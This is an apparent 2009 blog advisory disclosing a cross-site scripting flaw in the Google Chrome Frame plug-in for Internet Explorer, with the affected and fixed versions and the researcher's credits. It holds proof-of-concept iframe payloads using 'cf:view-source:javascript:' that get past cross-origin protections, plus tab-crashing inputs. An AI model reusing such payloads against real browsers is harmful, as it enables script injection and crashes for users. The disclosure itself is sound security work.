#####################################
Google Chrome Frame null domain XSS
vendor url:http://www.google.com/chromeframe
vendor changelog:http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
Advisore:http://lostmon.blogspot.com/
2009/11/google-chrome-frame-null-domain-xss.html
Vendor notify:yes Exploit available:YES
######################################
######################
Description by vendor
######################
Google Chrome Frame is a free plug-in for Internet Explorer.
Some advanced web apps, like Google Wave, use Google Chrome
Frame to provide you with additional features and better performance.
Google Chrome Frame is an early-stage open source
plug-in that seamlessly brings Google Chrome's open
web technologies and speedy JavaScript engine to
Internet Explorer.
################
version Afected
################
4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3
Not afected version:
4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5
you can find aditional information here:
http://googlechromereleases.blogspot.com/
2009/11/google-chrome-frame-update-bug-fixes.html
#####################
Cross Site scripting
#####################
Create a html document and some to test =>
<iframe src="javascript:alert(1)></iframe>
=> this opens the iframe and execute the alert
( this is correct)
<iframe src="cf:javascript:alert(1)></iframe>
this does not work , not show the alert ( correct)
and here is the flaw =>
<iframe src="cf:view-source:javascript:alert(1)></iframe>
This show & executed the alert it works on local & remote
scenario or via address bar too.
This bypassed cross-origin protections !!!
For google chrome browser test this
at the address bar =>
view-source:javascript:alert(1)
this execute the alert but recently google has made changes
in about:blank page and this issue is only exploitable
via address bar ,not in a iframe or frame or html document
so for that i think that this issue isn´t exploitable in a
remote scenario.
###########
crashes
###########
cf:view-source:about@: crash
cf:about@: => crashing the tab
##########
Solution
############
Google has automatic release a new version
of Chrome Frame 4.0.245.1 (Official Build 31970)
and this version is not afected.
#################€nd#############
Thnx to estrella To be mi ligth
Thnx To icar0 & sha0 from Badchecksum
Thnx To Google security Team
atentamente:
Security Research & Analisys.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
skip to main |
skip to sidebar
Security Research & Analisys:
Personal Blog where I expose my investigations,
advisores and some outstanding news on security.
Categories
Archives
-
►
2022
(2)
- ► November 2022 (1)
- ► October 2022 (1)
-
►
2013
(2)
- ► December 2013 (1)
- ► August 2013 (1)
-
►
2012
(5)
- ► April 2012 (1)
-
►
2011
(5)
- ► October 2011 (1)
- ► March 2011 (1)
-
►
2010
(18)
- ► December 2010 (2)
- ► September 2010 (1)
- ► March 2010 (1)
- ► February 2010 (1)
- ► January 2010 (1)
-
▼
2009
(25)
- ► April 2009 (1)
- ► March 2009 (1)
- ► February 2009 (1)
-
►
2008
(24)
- ► August 2008 (9)
- ► April 2008 (1)
- ► March 2008 (1)
-
►
2007
(29)
- ► October 2007 (1)
- ► March 2007 (1)
-
►
2006
(14)
- ► August 2006 (1)
- ► February 2006 (1)
-
►
2005
(54)
- ► December 2005 (1)
- ► April 2005 (14)
Browse
About:Me
My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com
La curiosidad es lo que hace
mover la mente...
Online Tools & Calculators
Posts
Lostmon Blogger © All Rights Reserved